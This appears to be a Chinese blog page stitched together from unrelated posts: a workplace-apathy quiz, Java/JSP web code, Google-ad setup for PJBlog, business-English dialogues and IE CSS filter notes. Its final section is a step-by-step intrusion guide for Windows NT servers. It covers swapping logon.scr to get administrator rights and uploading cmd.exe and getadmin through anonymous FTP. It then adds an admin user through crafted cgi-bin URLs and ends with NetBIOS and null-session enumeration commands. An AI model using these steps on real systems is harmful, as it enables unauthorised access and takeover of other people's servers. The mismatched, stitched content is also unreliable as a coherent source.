别以为这一切离你很远,事实上,身在职场2-5年内,80%的人变得越来越“橡皮”。不知不觉中,你已经跨到了职业生涯的边缘,或者下一刻,你就会被扫地出门。究竟你到底离“橡皮”有多远,你橡皮化的程度有多高呢,不如现在来做个测验。
一、你究竟有几分橡皮化
1.上司布置新工作后,你总是要等一段时间去实施。因为自己觉得工作简单,没必要这么着急。
2.无论大小会议上,走神是你的必修课。
3.一年之内.你没有受过任何的表彰和批评,但是这很正常,你不在乎。
4.对于公司里发生的一些人事安排,你总是觉得有所不妥,你认为你知道其中的猫腻。
5.总是想不通,为什么你的领导看上去总会有些错误安排。
6.公司改变管理制度,在你看来是个过场而已。
7.休息时间一起出去聚会可以,但你总是滔滔不绝地讲公司一些事情。而且总能得到大家的响应。
8.现在的新人好像都在异想天开,其实什么都不懂。
9.出了问题不想办法解决,反正总有人在某些时间会解决掉。
10.工作上混混日子就可以,因为你总是得不到和自己能力相适应的职位。
1—3项:橡皮黄色预警:现在你还不属于“橡皮族”的一员,但是已经有橡皮化的端倪出现。这样继续下去,很可能会给你的职场生涯带来一些伤害。改变上司、同事对你的好感,降低对你的期望值。
4-6项:橡皮橙色警报:你属于半橡皮化的范畴。个人的“品牌价值”已经下降了不少,在公司里,你是大家头疼又无奈的一个,因为有一些经验或者能力,你虽然不至于被扫地出门,但是也晋升无望,只能朝着全橡皮化,或者混混日子进军。
7—10项:橡皮红色警报:你绝对已经是顽固的“橡皮一族”,可以说在职场上神憎鬼厌,提到你,大家的反应是只能耸耸肩膀,或者感叹一声MY GOD,你已经成了下一批被新陈代谢出去的预备役。最可怕的是,你可能因为过度橡皮化.而被职场拒之门外。
解词:橡皮族——这里是借用橡皮的特性,没有痛感和反应,反弹力好,顽固。来指那些在职场上我行我素,不接受任何新生事物和意见,对于批评表扬无所谓,没有耻辱和荣誉感的人。
二、谁让我们越来越橡皮
诱因l:抱残守缺之成就
成就?没错,相信你自己的眼睛。的确是成就,老子说“祸兮,福之所倚;福兮,祸之所伏”绝对是个经典的真理。对于大多数职场中人来说,多年的打拼会给你带来不错的成绩。可是因此也可能会让你固步自封,沉溺于自己的成绩当中。对上司,你可能觉得他是个外行加以藐视,而新人,你干脆直接视而不见,甚至问:“新人在哪里?”这种抱残守缺,很容易让你逐渐橡皮化。一切以自我为中心。相伴而来的是人缘的流失和效率的丧失。当有一天你被新陈代谢,只能后悔莫及。
诱因2:经验
经验在大多时候是个好东西。可是你要明白,并不适合用在任何环境,任何条件下。经验是有生命的,随着社会的发展和时间的推移,可能会变成不合时宜的古董。这个时候牢牢抓住自己的经验不丢,只能让你成为大家眼里的老顽固,而一味地坚持自我,不理会各方面的意见,也是橡皮化的标志之一。
诱因3:批评
古话说,虱子多了不咬。所以批评多了,也就丝毫不加在意。自身“免疫力”的增长,让自己越来越适应各方面的批评和指责,走自己的路,让别人说去吧。在职场当中并不适用。这种免疫增强的橡皮模式,到最后会让你神憎鬼厌。
诱因4:定位错误
这是一种无奈情况下的橡皮化。一般来说,在职场当中。不会以你个人的意志为转移的。很多时候,你可能因为各种原因得不到自己想要的岗位和职位。这个时候心灰意冷,选择被动地橡皮下去,是很多人的对策。
诱因5:不公平待遇
你做得最多,成绩最好,效率最高,可是升迁的总是别人。你的创意不错,可是却总是把你的想法安到别人的头上。的确,职场并不是一个公平的环境,也没有绝对公平的存在。这点让人觉得不可思议,甚至对一切产生怀疑。因此,不如橡皮下去,我行我素。
诱因6:过度要求自己
这是初进职场人士的通病,怀着雄心壮志,却又不切合实际。总是用自己的标准来判断整个世界。失败者,因此龟缩一角橡皮保护,而短暂的成功,会让你有下一个疯狂的目标,直到自己力所未及。
看了这些,是不是有所警惕.恭喜你。终于对“橡皮”有了感觉.不过有人说:根治“橡皮”恐怕要治本,除却这些诱因之外。我们该从什么地方人手呢?其实很简单.那就是从你的心态人手。归根结底,“橡皮”是你的一些心态在作祟。
★是谁让我们越来越像橡皮
下拉列表联动 无刷下拉列表关联 ajax +Servlet
listajax.html
程序代码<html>
<head>
<title>MyHtml.html</title>
<meta http-equiv="keywords" content="keyword1,keyword2,keyword3">
<meta http-equiv="description" content="this is my page">
<!–<link rel="stylesheet" type="text/css" href="./styles.css">–>
</head>
<script type="text/javascript">
function getResult(stateVal) {
¡¡¡¡var url = "SelectCityServlet?state="+stateVal;
¡¡¡¡if (window.XMLHttpRequest) {
¡¡¡¡req = new XMLHttpRequest();
¡¡¡¡}else if (window.ActiveXObject) {
¡¡¡¡req = new ActiveXObject("Microsoft.XMLHTTP");
¡¡¡¡}
¡¡¡¡if(req){
¡¡ req.open("GET",url, true);
¡¡¡¡req.onreadystatechange = complete;
¡¡¡¡req.send(null);
¡¡¡¡}
}
function complete(){
¡¡¡¡if (req.readyState == 4) {
¡¡¡¡if (req.status == 200) {
¡¡¡¡var city = req.responseXML.getElementsByTagName("city");
¡¡¡¡//file:alert(city.length);
¡¡¡¡var str=new Array();
¡¡¡¡for(var i=0;i<city.length;i++){
¡¡¡¡str[i]=city[i].firstChild.data;
¡¡¡¡}
¡¡¡¡//file:alert(document.getElementById("city"));
¡¡¡¡buildSelect(str,document.getElementById("city"));
¡¡¡¡}
¡¡¡¡}
}
function buildSelect(str,sel) {
¡¡¡¡sel.options.length=0;
¡¡¡¡for(var i=0;i<str.length;i++) {
¡¡¡¡sel.options[sel.options.length]=new Option(str[i],str[i])
¡¡¡¡}
}
</script>
<body>
<select name="state" onChange="getResult(this.value)">
¡¡¡¡ <option value="">Select</option>
<option value="zj">ZEHJIANG</option>
<option value="zs">JIANGSU</option></select>
<select id="city">
¡¡¡¡<option value="">CITY</option>
</select>
</body>
</html>
2.Servlet 源文件
程序代码import java.io.IOException;
import java.io.PrintWriter;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
/**
* @author Administrator
*
* TODO To change the template for this generated type comment go to
* Window – Preferences – Java – Code Style – Code Templates
*/
public class SelectCityServlet extends HttpServlet {
public SelectCityServlet() {
super();
}
public void destroy() {
super.destroy();
}
public void doGet(HttpServletRequest request, HttpServletResponse response)
throws ServletException, IOException {
response.setContentType("text/xml");
response.setHeader("Cache-Control", "no-cache");
String state = request.getParameter("state");
StringBuffer sb=new StringBuffer("<state>");
if ("zj".equals(state)){
sb.append("<city>hangzhou</city><city>huzhou</city>");
} else if("zs".equals(state)){
sb.append("<city>nanjing</city><city>yangzhou</city><city>suzhou</city>");
}
sb.append("</state>");
PrintWriter out=response.getWriter();
out.write(sb.toString());
out.close();
}
}
在Eclipse中编译运行通过
JSP 数据库连接 嵌入JAVA数据apache derby 实例
1.创建数据库connect 'jdbc:derby:E:\\eclipse\\workspace\\test;create=true;user=sa;password=123';
2.创建表test
create table test(id INTEGER GENERATED ALWAYS AS IDENTITY (START WITH 1, INCREMENT BY 1),name varchar(10),password varchar(10));
3.插入数据
insert into test(name,password) values ('test','testpass');
4.显示数据
select * from test1;
ID |NAME |PASSWORD
———————————
1 |test |testpass
1 row selected
5.在Eclipse中创建derby.jsp文件,内容如下
显示被隐藏内容
结果如下:
Success loading derby Driver! Success connect derby server!1 test testpass
JBOSS4.3 数据连接池配置与调用
在JBOSS的\server\default\deploy目录下,修改mssql-ds.xml(我用的MSSQL)
然后通过incdb.jsp文件调用
<%@ page import="javax.naming.*" %>
<%@ page import="javax.sql.*" %>
<%@ page import="java.sql.*" %>
<%!
javax.sql.DataSource ds;
%>
<%
try {
Context ctx = new InitialContext();
ds = (javax.sql.DataSource)ctx.lookup("java:/MSSQLDS");
} catch (Exception e) {
out.println("erro when connect to java naming api");
}
Connection conn = ds.getConnection();
Statement st = conn.createStatement();
//String sqlStr = "Select truename FROM SalesMan";
//ResultSet rs = st.executeQuery(sqlStr);
%>
JSP传递中的中文乱码解决:
request.setCharacterEncoding("gb2312"); //
PJBLOG 博客 广告 加速
第一步,当然是申请GOOGLE AD 代码了
第二步,在网站后台,打开USER 侧边模块 选择HTML代码编辑 加入以下代码
程序代码<span id="myads">Google广告载入中…</span>
在footer.asp加入以下脚本
程序代码<span id="span_myads">
<script type="text/javascript"><!–
google_ad_client = "pub-6227743486540211";
google_ad_width = 180;
google_ad_height = 60;
google_ad_format = "180x60_as_rimg";
google_cpa_choice = "CAAQ0cX8zwEaCEpGRZ0Cl8yyKPu_93M";
google_ad_channel = "";
//–></script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
</span>
第三步,通过电子相册(因为我一直没有用它,所以另作他用)加入GOOGLE SEARCH
打开内容模块 NewGallery 选择HTML编辑
加入以下代码,原来的可用,直接删了(这样好看一点,哈哈。)
程序代码<$NewGallery$> <!– 不用可以删了这行 –>
<!– SiteSearch Google –>
<form method="get" action="http://www.google.cn/custom" target="google_window">
<table border="0" bgcolor="#ffffff">
<tr><td nowrap="nowrap" valign="top" align="left" height="32">
<a href="http://www.google.com/">
<img src="http://www.google.com/logos/Logo_25wht.gif" border="0" alt="Google" align="middle"></img></a>
</td>
<td nowrap="nowrap">
<input type="hidden" name="domains" value="www.ycsznet.com"></input>
<input type="text" name="q" size="45" maxlength="255" value=""></input>
<input type="submit" name="sa" value="ËÑË÷"></input>
</td></tr>
<tr>
<td> </td>
<td nowrap="nowrap">
<table>
<tr>
<td>
<input type="radio" name="sitesearch" value="" checked="checked"></input>
<font size="-1" color="#000000">Web</font>
</td>
<td>
<input type="radio" name="sitesearch" value="www.ycsznet.com"></input>
<font size="-1" color="#000000">www.ycsznet.com</font>
</td>
</tr>
</table>
<input type="hidden" name="client" value="pub-6227743486540211"></input>
<input type="hidden" name="forid" value="1"></input>
<input type="hidden" name="ie" value="UTF-8"></input>
<input type="hidden" name="oe" value="UTF-8"></input>
<input type="hidden" name="cof" value="GALT:#008000;GL:1;DIV:#336699;VLC:663399;AH:center;BGC:FFFFFF;LBGC:336699;ALC:0000FF;LC:0000FF;T:000000;GFNT:0000FF;GIMP:0000FF;FORID:1"></input>
<input type="hidden" name="hl" value="zh-CN"></input>
</td></tr></table>
</form>
<!– SiteSearch Google –>
第四步,在内容页加下Google Content
主要修改Template目录下的Article.asp和class目录下的cls_article.asp
在Article.asp修改的位置如下
程序代码<div id="logPanel" class="Content-body">
<$ArticleContent$>
<br/>
<%'2006-10-13 add google ad %>
<div id="Content_GoogleAD2" class="content-width">
<div style="text-align:left;padding:3px;background:#F7F6F4">
<script type="text/javascript"><!–
google_ad_client = "pub-6227743486540211";
google_ad_width = 468;
google_ad_height = 60;
google_ad_format = "468x60_as";
google_ad_type = "text_image";
google_ad_channel = "";
//–></script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
</div></div>
<%'2006-10-13 end%>
<br/>
<br/>
</div>
<div class="Content-body">
在cls_article.asp修改的位置如下
程序代码else
response.write (highlight(UnCheckStr(log_ViewArr(8,0)),keyword))
end if %>
<%'2006-10-13 add google ad %>
<div id="Content_GoogleAD2" class="content-width">
<div style="text-align:left;padding:3px;background:#F7F6F4">
<script type="text/javascript"><!–
google_ad_client = "pub-6227743486540211";
google_ad_width = 468;
google_ad_height = 60;
google_ad_format = "468x60_as";
google_ad_type = "text_image";
google_ad_channel = "";
//–></script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
</div></div>
<%'2006-10-13 end%>
<br/><br/>
</div>
<div class="Content-body">
然后到后台,初始化数据,重建前4项
效果请看本站。如果有什么问题,可以QQ交流:34155711
外贸英语—用商务英语谈生意(介绍篇)
(1)
A: I don't believe we've met.
B: No, I don't think we have.
A: My name is Chen Sung-lim.
B: How do you do? My name is Fred Smith.
A: 我们以前没有见过吧?
B:我想没有。
A:我叫陈松林。
B:您好,我是弗雷德•史蜜斯。
(2)
A: Here's my name card.
B: And here's mine.
A: It's nice to finally meet you.
B: And I'm glad to meet you, too.
A: 这是我的名片。
B: 这是我的。
A: 很高兴终于与你见面了。
B: 我也很高兴见到你。
(3)
A: Is that the office manager over there?
B: Yes, it is,
A: I haven't met him yet.
B: I'll introduce him to you .
A:在那边的那位是经理吧?
B:是啊。
A:我还没见过他。
B:那么,我来介绍你认识。
(4)
A: Do you have a calling card ?
B: Yes , right here.
A: Here's one of mine.
B: Thanks.
A:您有名片吗?
B:有的,就在这儿。
A:喏,这是我的。
B:谢谢。
(5)
A: Will you introduce me to the new purchasing agent?
B: Haven't you met yet?
A: No, we haven't.
B: I'll be glad to do it.
A:请替我引介新来负责采购的人好吗?
B:你们还没见面吗?
A:嗯,没有。
B:我乐意为你们介绍。
(6)
A: I'll call you next week.
B: Do you know my number?
A: No, I don't.
B: It's right here on my card.
A:我下个星期会打电话给你。
B:你知道我的号码吗?
A:不知道。
B:就在我的名片上。
(7)
A: Have we been introduced?
B: No, I don't think we have been.
A: My name is Wong.
B: And I'm Jack Smith.
A:对不起,我们彼此介绍过了吗?
B:不,我想没有。
A:我姓王。
B:我叫杰克•史密斯。
(8)
A: Is this Mr. Jones?
B: Yes, that's right.
A: I'm just calling to introduce myself. My name is Tang.
B: I'm glad to meet you, Mr. Tang.
A:是琼斯先生吗?
B:是的。
A:我打电话是向您作自我介绍,我姓唐。
B:很高兴认识你,唐先生。
(9)
A: I have a letter of introduction here.
B: Your name, please?
A: It's David Chou.
B: Oh, yes, Mr. Chou. We've been looking forward to this.
A:我这儿有一封介绍信。
B:请问贵姓大名?
A:周大卫。
B:啊,周先生,我们一直在等着您来。
(10)
A: I'll call you if you give me a name card.
B: I'm sorry, but I don't have any with me now.
A: Just tell me your number, in that case.
B: It's 322-5879.
A:给我一张名片吧,我会打电话给你.。
B:真抱歉,我现在身上没带。
A:这样子,那就告诉我你的电话号码好了。
B:322-5879。
约会篇
11)
A: Do you have some time tomorrow?
B: Yes, I do.
A: How about having lunch with me?
B: Good idea.
A:明天有空吧?
B:有啊。
A:一起吃顿中饭怎样?
B:好主意。
12)
A: If you‘re free, how about lunch?
B: When did you have in mind?
A: I was thinking about Thursday?
B: That will be fine with me.
A:有空的话一起吃顿中饭如何?
B:你想什么时候呢?
A:我看星期四怎样?
B:没问题。
13)
A: I‘m calling to see if you would like to have lunch tomorrow.
B: I‘m sorry, but this week isn‘t very convenient for me.
A: Perhaps we van make it later.
B: That would be better.
A:我打电话给你,是想知道明天一起吃顿中饭怎样?
B:对不起,这个星期我都不方便。
A:那么,也许改天吧。
B:好啊。
14)
A: I‘m calling to confirm our luncheon appointment.
B: It‘s tomorrow at twelve o‘clock, right?
A: Yes, that‘s right.
B: I‘ll be there.
A:我打电话来,是想确定一下我们约好吃饭的事。
B:是明天12点吧?
A:是的,没错。
B:我会去的。
15)
A: I‘m sorry, but I have to cancel out luncheon appointment.
B: I‘m sorry to hear that.
A: I have pressing business to attend to .
B: No problem. we‘ll make it later in the month .
A:真抱歉,不过我不得不取消我们午餐的约会。
B:真遗憾。
A:我有紧急的事情要处理。
B:没关系,这个月改天再说吧。
16)
A: I need to change the time we meet for lunch.
B: What time would be good for you?
A: I‘ll be about half an hour late.
B: Good, I‘ll see you there at 12:30.
A:我需要更改我们见面吃午饭的时间。
B:什么时间你合适呢?
A:我大概要慢半个小时。
B:好的,十二点我会在那儿与你碰面。
17)
A: I‘ll get the check.
B: No, let me pay this time.
A: No, I insist.
B: Well, thank you very much.
A:我来付帐。
B:不,这次由我付。
A:不,还是我来。
B:好吧,那就谢谢你啦?
18)
A: This lunch is on me today,
B: I think you got it last time.
A: It‘s my pleasure.
B: That‘s very nice of you.
A:今天这顿饭算我请客。
B:我记得上回也是你请的。
A:我请得心里高兴。
B:既然这样,那就多谢了。
19)
A: Shall we split the check.
B: Why don‘t you let me pick it up.
A: Oh, that‘s not necessary.
B: I know it‘s not necessary. I want to do it.
A:大家分摊吧?
B:就让我来付帐好了。
A:啊,不必这样。
B:我知道不必这样,可是我愿付?
20)
A: I really enjoyed the lunch.
B: Yes, let‘s do it again real soon.
A: I‘ll be back in town next month.
B: Good, I‘ll invite you out when you‘re here.
A:这顿饭我吃得好高兴。
B:是啊,让我们不久再一起用餐吧。
A:我下个月会再回这里来。
B:好极了,等你来的时候,请再接受我的招待。
电子书不能复制文字的问题
网上的电子书越来越多,难免会看到一些好的内容。
可经常会遇到内容无法复制的问题。
就是用CTRL+C也没有用。
那就试试这个吧。
首先打开Word,然后选中电子书中的内容CTRL+A(或将你的鼠标放在此电子书文本的右下方,按住“Shift”单机鼠标右键,再点击鼠标左键.)拖拽到Word文档中
哈哈,是不是好了。
读取日志出错3002文件无法被打开
重新安装或备份PJBlog需要备份的文件,如下:
cache/*.*
post/*.*
blogDB/PBLog2.asp
attachments/*.*
如果cache和post的文件夹的内容没有被备份并且上传
就会出现如下错误:
读取日志出错. 3002 : 文件无法被打开
滤镜-JAVASCRIPT-CSS-Style
现在非常多的朋友搞个人网页,而且做的五彩缤纷,各有特色,但是比较多的朋友把大大的一幅图象放在页面上,致使页面下载很慢,加上用GIF格式做动画,尽管用GIF格式搞的动画比较苗条,但是也不大合算。能否不用特别做的图象,不用GIF格式做动画,可以把页面搞的生气活现呢?可以,用IE本身内含的STYLE这个重量级的命令属性中的RevealTrans和滤镜来试试!
Style属性:
可以应用在标签中,更可用广泛应用在<table><tr><td><body><center><img><input><font><form><frame><label><map>等等标签中,更重要的是,它可用在标签中。
页面切换效果:
在页面前部与之间加入""
说明:duration为页面切换的时间长度,3.000表示3秒钟,一般可以直接输入3便可;transition为切换效果,从1-23共22种不同的切换效果,其中23为随机效果。
滤镜效果:
Photoshop的滤镜用的多了吧,在页面中也用滤镜搞搞新意思吧!
语法:STYLE="filter:filtername(fparameter1,fparameter2…)}(Filtername为滤镜的名称,fparameter1、fparameter2等是滤镜的参数)
滤镜说明:
Alpha:设置透明层次.
blur:创建高速度移动效果,即模糊效果.
Chroma:制作专用颜色透明.
DropShadow:创建对象的固定影子.
FlipH:创建水平镜像图片.
FlipV:创建垂直镜像图片.
glow:加光辉在附近对象的边外.
gray:把图片灰度化.
invert:反色.
light:创建光源在对象上.
mask:创建透明掩膜在对象上.
shadow:创建偏移固定影子.
wave:波纹效果.
Xray:使对象变的像被x光照射一样.
1.滤镜:alpha
语法:
STYLE="filter:Alpha(Opacity=opacity,FinishOpacity=finishopacity,Style=style,
StartX=startX,StartY=startY,FinishX=finishX,FinishY=finishY)"
说明:
Opacity:起始值,取值为0-100,0为透明,100为原图.
FinishOpacity:目标值.
Style:1或2或3
StartX:任意值
StartY:任意值
例子:filter:Alpha(Opacity="0",FinishOpacity="40",Style="2")
2.滤镜:blur
语法:
STYLE="filter:Blur(Add=add,Direction=direction,Strength=strength)"
说明:
Add:一般为1,或0.
Direction:角度,0-315度,步长为45度.
Strength:效果增长的数值,一般5即可.
例子:filter:Blur(Add="1",Direction="45",Strength="5")
3.滤镜:chroma
语法:
STYLE="filter:Chroma(Color=color)"
说明:
color:#rrggbb格式,任意.
例子:filter:Chroma(Color="#FFFFFF")
4.滤镜:DropShadow
语法:
STYLE="filter:DropShadow(Color=color,OffX=offX,OffY=offY,Positive=positive)"
说明:
Color:#rrggbb格式,任意.
Offx:X轴偏离值.
Offy:Y轴偏离值.
Positive:1或0.
例子:filter:DropShadow(Color="#6699CC",OffX="5",OffY="5",Positive="1")
5.滤镜:FlipH
语法:
STYLE="filter:FlipH"
例子:filter:FlipH
6.滤镜:FlipV
语法:
STYLE="filter:FlipV"
例子:filter:FlipV
7.滤镜:Glow
语法:
STYLE="filter:Glow(Color=color,Strength=strength)"
说明:
Color:发光颜色.
Strength:强度(0-100)
例子:filter:Glow(Color="#6699CC",Strength="5")
8滤镜:Gray
语法:
STYLE="filter:Gray"
例子:filter:Gray
9.滤镜:Invert
语法:
STYLE="filter:Invert"
例子:filter:Invert
10.滤镜:Mask
语法:
STYLE="filter:Mask(Color=color)"
例子:filter:Mask(Color="#FFFFE0")
11.滤镜:Shadow
语法:
filter:Shadow(Color=color,Direction=direction)
说明:
Color:#rrggbb格式.
Direction:角度,0-315度,步长为45度.
例子:filter:Shadow(Color="#6699CC",Direction="135")
12.滤镜:Wave
语法:
filter:Wave(Add=add,Freq=freq,LightStrength=strength,Phase=phase,Strength=strength)
说明:
Add:一般为1,或0.
Freq:变形值.
LightStrength:变形百分比.
Phase:角度变形百分比.
Strength:变形强度.
例子:filter:wave(Add="0",Phase="4",Freq="5",LightStrength="5",Strength="2")
13.滤镜:Xray
语法:
STYLE="filter:Xray"
例子:filter:Xray
提升管理员权限-administrator登录
如果你有普通用户帐号,有个一个很简单的方法获取NT Administrator帐号:
先把c:\winnt\system32下的logon.scr改名为logon.old备份
然后把usrmgr.exe改名为logon.scr
然后重新启动
logon.scr是启动时加载的程序,重新启动后,不会出现以往的登陆密码输入界面,而是用户管理器
这时他就有权限把自己加到Administrator组
不要忘记把文件名改回来啊!
之二:
下面的技术适用于不重视NT网络安全的网站,
一些 http的技术也可以供较高级的人员参考
进入NT网络可以采取下面的步骤:
因为NT的IIS server的ftp一般都是允许anonymous匿名帐号进入的,有些anonymous的帐号还有upload权限,我们就要攻击这类站点。因为如果不允许匿名帐号,就可能造成明文密码在网上传输。用tcpspy的工具可以截获这些密码。现在不谈这些比较高级的技术。
正因为允许匿名帐号ftp登陆的设定,也给我们带来了突破NT server的机会。我们用ftp登陆一个NT server,比如:www.xxx.com(示例名):
ftp www.xxx.com
Connected to www.xxx.com
ntsvr2这个东西暴露了其NETbios名,那么在IIS的背景下,必然会有一个IUSER_ntsvr2的用户帐号,属于Domain user组,这个帐号我们以后要用来获取Administrator的权限
User (www.xxx.com:(none)):anonymous
Password: 输入 guest@ 或者guest
对于缺乏网络安全知识的管理员来说,很多人没有将guest帐号禁止,或者没有设置密码。那么guest帐号就是一个可用的正确的用户帐号,虽然只属于Domain guest组
在这种情况下我们就可以进NT server的ftp了。
进去以后,看看目录列表,试试 cd /c 或wwwroot等关键目录,如果运气好,改变目录成功,这时你就有了80%的把握。
现在,开始查找cgi-bin目录(或者scripts目录),进去以后,
把winnt下的cmd.execopy到cgi-bin,把getadmin和gasys.dll传上去到cgi-bin
然后输入:http://www.xxx.com/cgi-bin/getadmin.exe?IUSR_SATURN
大约十多秒后屏幕显示:
CGI Error
这时有90%的可能是:你已经把IUSER_ntsvr2升级为Administrator,也就是任何访问该web站的人都是管理员
下面可以add user:
http://www.xxx.com/cgi-bin/cmd.exe?/c c:\winnt\system32\net.exe user china news /add
这样就创建了一个叫china用户,密码是news,然后:
http://www.xxx.com/cgi-bin/getadmin.exe?china
或者
http://www.xxx.com/scripts/tools/getadmin.exe?china
你再用china的帐号登陆,就可以有最大的权限了,也可以用上面的cmd.exe的方法直接修改如果没有cmd.exe,也可以自己传一个上去到scripts/tools或者cgi-bin目录
之三:
用NT的Netbios技术扫描
nbtstat -a http://www.xxx.com/
或者
nbtstat -A http://www.xxx.com/
这样可以得到其域的共享资源名称
net view file://www.xxx.com/
可以获得其机器的共享资源名称,如果有c盘
net use f: file://www.xxx.com/c
可以用f:映射其c盘
net use \\111.111.111.111\ipc$ "quot;"quot; /user:"quot;"quot;
之四: Unix下移植过来的工具:
Windows95"amp;98的用户可以用这个tcp/ip工具去抓tcp/ip连接中的包:
WinDump95.exe 使用前还要下载这个库 Packet95.exe
WindowsNT用户的版本
WinDump.exe PacketNT.exe
